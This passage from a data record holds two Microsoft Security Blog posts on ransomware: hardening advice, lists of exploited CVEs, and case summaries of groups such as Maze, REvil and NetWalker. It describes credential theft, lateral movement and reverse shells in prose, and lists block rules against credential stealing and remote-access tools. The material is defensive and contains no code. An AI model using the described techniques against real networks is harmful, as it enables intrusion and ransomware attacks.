admins understand which credentials are vulnerable to theft via LSASS or LSA Secrets. Ideally, any highly privileged account like a Domain Admin shouldn\u2019t be exposed on member servers or workstations.\n * Monitor for EventID 4625 (Logon Failed events) in Windows Event Forwarding when removing accounts from privileged groups. Adding them to the local administrator group on a limited set of machines to keep an application running still reduces the scope of an attack as against running them as Domain Admin.\n * Randomize Local Administrator passwords with a tool like [Local Administrator Password S](<https://aka.ms/laps>)olution (LAPS) to prevent lateral movement using local accounts with shared passwords.\n * Use a [cloud-based identity security solution](<https://docs.microsoft.com/defender-for-identity/what-is>) that leverages on-premises Active Directory signals get visibility into identity configurations and to identify and detect threats or compromised identities\n\n### Auditing credential exposure\n\nAuditing credential exposure is critical in preventing ransomware attacks and cybercrime in general. [BloodHound](<https://github.com/BloodHoundAD/BloodHound>) is a tool that was originally designed to provide network defenders with insight into the number of administrators in their environment. It can also be a powerful tool in reducing privileges tied to administrative account and understanding your credential exposure. IT security teams and SOCs can work together with the authorized use of this tool to enable the reduction of exposed credentials. Any teams deploying BloodHound should monitor it carefully for malicious use. They can also use [this detection guidance](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726>) to watch for malicious use.\n\nMicrosoft has observed ransomware attackers also using BloodHound in attacks. When used maliciously, BloodHound allows attackers to see the path of least resistance from the systems they have access, to highly privileged accounts like domain admin accounts and global administrator accounts in Azure.\n\n### Prioritizing deployment of Active Directory updates\n\nSecurity patches for Active Directory should be applied as soon as possible after they are released. Microsoft has witnessed ransomware attackers adopting authentication vulnerabilities within one hour of being made public and as soon as those vulnerabilities are included in tools like Mimikatz. Ransomware activity groups also rapidly adopt vulnerabilities related to authentication, such as ZeroLogon and PetitPotam, especially when they are included in toolkits like Mimikatz. When unpatched, these vulnerabilities could allow attackers to rapidly escalate from an entrance vector like email to Domain Admin level privileges.\n\n### Cloud hardening\n\nAs attackers move towards cloud resources, it\u2019s important to secure cloud resources and identities as well as on-premises accounts. Here are ways organizations can harden cloud environments:\n\n**Cloud identity hardening**\n\n * Implement the [Azure Security Benchmark](<https://docs.microsoft.com/security/benchmark/azure/>) and general [best practices for securing identity infrastructure](<https://docs.microsoft.com/azure/security/fundamentals/identity-management-best-practices>), including:\n * Prevent on-premises service accounts from having direct rights to the cloud resources to prevent lateral movement to the cloud.\n * Ensure that \u201cbreak glass\u201d account passwords are stored offline and configure honey-token activity for account usage.\n * Implement [Conditional Access policies](<https://docs.microsoft.com/azure/active-directory/conditional-access/plan-conditional-access>) enforcing [Microsoft\u2019s Zero Trust principles](<https://www.microsoft.com/security/business/zero-trust>).\n * Enable [risk-based user sign-in protection](<https://docs.microsoft.com/azure/active-directory/authentication/tutorial-risk-based-sspr-mfa>) and automate threat response to block high-risk sign-ins from all locations and enable MFA for medium-risk ones.\n * Ensure that VPN access is protected via [modern authentication methods](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#step-1-enable-modern-authentication-in-your-directory>).\n\n**Multifactor authentication (MFA)**\n\n * Enforce MFA on all accounts, remove users excluded from MFA, and strictly r[equire MFA](<https://docs.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy>) from all devices, in all locations, at all times.\n * Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for the different authentication methods and features.\n * [Identify and secure workload identities](<https://docs.microsoft.com/azure/active-directory/identity-protection/concept-workload-identity-risk>) to secure accounts where traditional MFA enforcement does not apply.\n * Ensure that users are properly educated on not accepting unexpected two-factor authentication (2FA).\n * For MFA that uses authenticator apps, ensure that the app requires a code to be typed in where possible, as many intrusions where MFA was enabled (including those by DEV-0537) still succeeded due to users clicking \u201cYes\u201d on the prompt on their phones even when they were not at their [computers](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match>). Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for an example.\n * Disable [legacy authentication](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#moving-away-from-legacy-authentication>).\n\n**Cloud admins**\n\n * Ensure cloud admins/tenant admins are treated with [the same level of security and credential hygiene](<https://docs.microsoft.com/azure/active-directory/roles/best-practices>) as Domain Admins.\n * Address [gaps in authentication coverage](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-authentication-find-coverage-gaps>).\n\n### Addressing security blind spots\n\nIn almost every observed ransomware incident, at least one system involved in the attack had a misconfigured security product that allowed the attacker to disable protections or evade detection. In many instances, the initial access for access brokers is a legacy system that isn\u2019t protected by antivirus or EDR solutions. It\u2019s important to understand that the lack security controls on these systems that have access to highly privileged credentials act as blind spots that allow attackers to perform the entire ransomware and exfiltration attack chain from a single system without being detected. In some instances, this is specifically advertised as a feature that access brokers sell.\n\nOrganizations should review and verify that security tools are running in their most secure configuration and perform regular network scans to ensure appropriate security products are monitoring and protecting all systems, including servers. If this isn\u2019t possible, make sure that your legacy systems are either physically isolated through a firewall or logically isolated by ensuring they have no credential overlap with other systems.\n\nFor Microsoft 365 Defender customers, the following checklist eliminates security blind spots:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.\n * Enable [network protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.\n * Use [device discovery](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.\n * [Protect user identities and credentials](<https://docs.microsoft.com/defender-for-identity/what-is>) using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.\n\n### Reducing the attack surface\n\nMicrosoft 365 Defender customers can turn on [attack surface reduction rules](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide>) to prevent common attack techniques used in ransomware attacks. These rules, which can be configured by all Microsoft Defender Antivirus customers and not just those using the EDR solution, offer significant hardening against attacks. In observed attacks from several ransomware-associated activity groups, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevented hands-on-keyboard activity:\n\n * Common entry vectors:\n * [Block all Office applications from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block Office communication application from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-communication-application-from-creating-child-processes>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block Office applications from injecting code into other processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-injecting-code-into-other-processes>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * Ransomware deployment and lateral movement stage (in order of impact based on the stage in attack they prevent):\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)\n * [Block process creations originating from PsExec and WMI commands](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n * [Use advanced protection against ransomware](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#use-advanced-protection-against-ransomware>)\n\nIn addition, Microsoft has changed the [default behavior of Office applications to block macros](<https://docs.microsoft.com/DeployOffice/security/internet-macros-blocked>) in files from the internet, further reduce the attack surface for many human-operated ransomware attacks and other threats.\n\n### Hardening internet-facing assets and understanding your perimeter\n\nOrganizations must identify and secure perimeter systems that attackers might use to access the network. Public scanning interfaces, such as [RiskIQ](<https://www.riskiq.com/what-is-attack-surface-management/>), can be used to augment data. Some systems that should be considered of interest to attackers and therefore need to be hardened include:\n\n * Secure Remote Desktop Protocol (RDP) or Windows Virtual Desktop endpoints with MFA to harden against password spray or brute force attacks.\n * Block Remote IT management tools such as Teamviewer, Splashtop, Remote Manipulator System, Anydesk, Atera Remote Management, and ngrok.io via network blocking such as perimeter firewall rules if not in use in your environment. If these systems are used in your environment, enforce security settings where possible to implement MFA.\n\nRansomware attackers and access brokers also use unpatched vulnerabilities, whether already disclosed or zero-day, especially in the initial access stage. Even older vulnerabilities were implicated in ransomware incidents in 2022 because some systems remained unpatched, partially patched, or because access brokers had established persistence on a previously compromised systems despite it later being patched.\n\nSome observed vulnerabilities used in campaigns between 2020 and 2022 that defenders can check for and mitigate include:\n\n * Citrix ADC systems affected by [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)\n * [Pulse Secure VPN systems](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) affected by [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>), [CVE-2020-8260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8260>), [CVE-2020-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8243>), [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), [CVE-2021-22894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22894>), [CVE-2021-22899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22899>), and [CVE-2021-22900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22900>)\n * SonicWall SSLVPN affected by [CVE-2021-20016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20016>)\n * Microsoft SharePoint servers affected by [CVE-2019-0604](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2019-0604>)\n * Unpatched [Microsoft Exchange servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>)\n * Zoho ManageEngine systems affected by [CVE-2020-10189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189>)\n * FortiGate VPN servers affected by [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)\n * Apache log4j [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\nRansomware attackers also rapidly [adopt new vulnerabilities](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). To further reduce organizational exposure, Microsoft Defender for Endpoint customers can use the [threat and vulnerability management](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations.\n\n## Microsoft 365 Defender: Deep cross-domain visibility and unified investigation capabilities to defend against ransomware attacks\n\nThe multi-faceted threat of ransomware requires a comprehensive approach to security. The steps we outlined above defend against common attack patterns and will go a long way in preventing ransomware attacks. [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) is designed to make it easy for organizations to apply many of these security controls.\n\nMicrosoft 365 Defender\u2019s industry-leading visibility and detection capabilities, demonstrated in the recent [MITRE Engenuity ATT&CK\u00ae Evaluations](<https://www.microsoft.com/security/blog/2022/04/05/microsoft-365-defender-demonstrates-industry-leading-protection-in-the-2022-mitre-engenuity-attck-evaluations/>), automatically stop most common threats and attacker techniques. To equip organizations with the tools to combat human-operated ransomware, which by nature takes a unique path for every organization, Microsoft 365 Defender provides rich investigation features that enable defenders to seamlessly inspect and remediate malicious behavior across domains.\n\n[Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)\n\nIn line with the recently announced expansion into a new service category called [**Microsoft Security Experts**](<https://www.microsoft.com/en-us/security/business/services>), we're introducing the availability of [Microsoft Defender Experts for Hunting](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/defenderexpertsforhuntingprev>) for public preview. Defender Experts for Hunting is for customers who have a robust security operations center but want Microsoft to help them proactively hunt for threats across Microsoft Defender data, including endpoints, Office 365, cloud applications, and identity.\n\nJoin our research team at the **Microsoft Security Summit** digital event on May 12 to learn what developments Microsoft is seeing in the threat landscape, as well as how we can help your business mitigate these types of attacks. Ask your most pressing questions during the live chat Q&A. [Register today.](<https://mssecuritysummit.eventcore.com?ocid=AID3046765_QSG_584073>)\n\nThe post [Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-09T13:00:00", "type": "mssecure", "title": "Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-20016", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-31207", "CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-05-09T13:00:00", "id": "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "href": "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-30T23:04:13", "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. [Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your 